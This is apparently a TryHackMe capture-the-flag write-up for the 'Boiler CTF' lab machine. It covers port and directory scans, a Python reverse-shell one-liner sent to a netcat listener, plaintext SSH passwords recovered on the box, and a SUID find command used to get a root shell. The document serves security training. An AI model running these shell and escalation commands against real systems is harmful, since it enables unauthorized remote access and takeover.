# Boiler CTF

**Room Link:** <https://tryhackme.com/room/boilerctf2>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FUF9lgBTxBRQVfeqa7dEx%2Fimage.png?alt=media&#x26;token=bd025797-b8cd-40e3-92f1-7678f64bd668" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F2qnHZNjXlXD0rbiOA6ew%2Fimage.png?alt=media&#x26;token=1df912b2-2d17-4f2e-afd8-1fc8949a1190" alt=""><figcaption></figcaption></figure>

## TCP/21 - HTTP

**Kali**

```
ftp $VICTIM
ls -lah 
get .info.txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FW3PTEreGmPEoP2owZ6SJ%2Fimage.png?alt=media&#x26;token=a00d8de0-b827-4fe9-a380-7753cd17d503" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZkxUEbfHSa3TTx8g6Rmb%2Fimage.png?alt=media&#x26;token=5d9547d5-9a49-4cfa-a921-465480a77992" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYzm7vzXGLc3mjN7w4pdV%2Fimage.png?alt=media&#x26;token=d8d23ca9-fac8-4b6b-b8ab-c599eeca7685" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fqn8wud4snopg5SzkCKiE%2Fimage.png?alt=media&#x26;token=4fe6cbcb-828f-468f-bf2c-c24661712a8e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FEVEZswsL8IVnHrk4yefA%2Fimage.png?alt=media&#x26;token=e6913631-ccb1-4c90-8491-935de2d9cac2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FH19OHQSl82mPblT1Vi29%2Fimage.png?alt=media&#x26;token=a394b5d1-4196-4c0b-a604-7b7767355ac3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FWumpDnyT3rTyPIm6H6Gt%2Fimage.png?alt=media&#x26;token=74ad7428-d981-4320-86b7-4365361a3eb7" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/joomla -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FqKHjEIpcgNyxJ2dOgCTv%2Fimage.png?alt=media&#x26;token=650ec91f-27f4-4726-9939-277d3c32c5cd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FDCrGchX8nS9cwvrYssf0%2Fimage.png?alt=media&#x26;token=51144126-0896-409b-abfe-62bc220ecff6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FGaSioENCmR51h4Sb2WZg%2Fimage.png?alt=media&#x26;token=b2d00818-79dd-4726-9467-8462245fa836" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPi8dThQcG5Ck0PLcO1Ox%2Fimage.png?alt=media&#x26;token=f1a43254-e40e-4259-bf1d-e085c6bb05cc" alt=""><figcaption></figcaption></figure>

## **Initial Shell**

**Exploit:** <https://www.exploit-db.com/exploits/47204>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FDLjL28iHavUSN958DyNp%2Fimage.png?alt=media&#x26;token=eed1fb06-895f-4385-8d11-2f68978424a2" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvnp 1337
```

**Browser command**

```
export RHOST="10.10.157.229";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FwaoS8CHzsZEsuI4MkImr%2Fimage.png?alt=media&#x26;token=f7890c9d-6123-4e7e-afe2-4e3ca0ed1349" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

There is a file that has credentials

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FRHDs3UXzU7uMHft9w14Z%2Fimage.png?alt=media&#x26;token=5b6c9ee8-c84a-4c4f-b387-68979103f5c0" alt=""><figcaption></figcaption></figure>

It was also possible to view from the browser

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4u1v4R1WAuKqWYTd6guX%2Fimage.png?alt=media&#x26;token=7c5bcd11-ce85-4927-951d-04088f50c7d7" alt=""><figcaption></figcaption></figure>

## TCP/55007 - SSH

**Kali**

```
ssh basterd@$VICTIM -p 55007
Pass: superduperp@$$
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSD9HyZKaShfLvRifRLcM%2Fimage.png?alt=media&#x26;token=99ddf6e6-b472-48e0-a4e2-02f8494e5bfd" alt=""><figcaption></figcaption></figure>

There is a backup.sh script that is owned by user stoner, which has his credentials.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FzloYUIfmyQn4je8GVmZm%2Fimage.png?alt=media&#x26;token=cd0bed71-2e52-40f4-a16f-2a9328c3a2be" alt=""><figcaption></figcaption></figure>

**Kali**

```
ssh stoner@$VICTIM -p 55007                                            
Pass: superduperp@$$no1knows 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F6U2mkd6FibjPTMJu6REw%2Fimage.png?alt=media&#x26;token=9601978d-a31a-45ff-ba4b-e855088274b5" alt=""><figcaption></figcaption></figure>

## **Privilege Escalation**

We can exploit SUID for the find command

**Exploit:** <https://gtfobins.github.io/gtfobins/find/>

**Victim**

```
find / -perm -u=s -type f 2> /dev/null 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSdLQXTo6ZLYwKVYZmxuR%2Fimage.png?alt=media&#x26;token=dfd09861-f46b-4c8a-a209-3c55046da6f7" alt=""><figcaption></figcaption></figure>

Had to specify the full path, it doesn't work if you don't

**Victim**

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FqtYQCQEOZf5XcoBBRNeA%2Fimage.png?alt=media&#x26;token=661e4857-29a9-4e28-88a8-0ec3e0d5b58a" alt=""><figcaption></figcaption></figure>
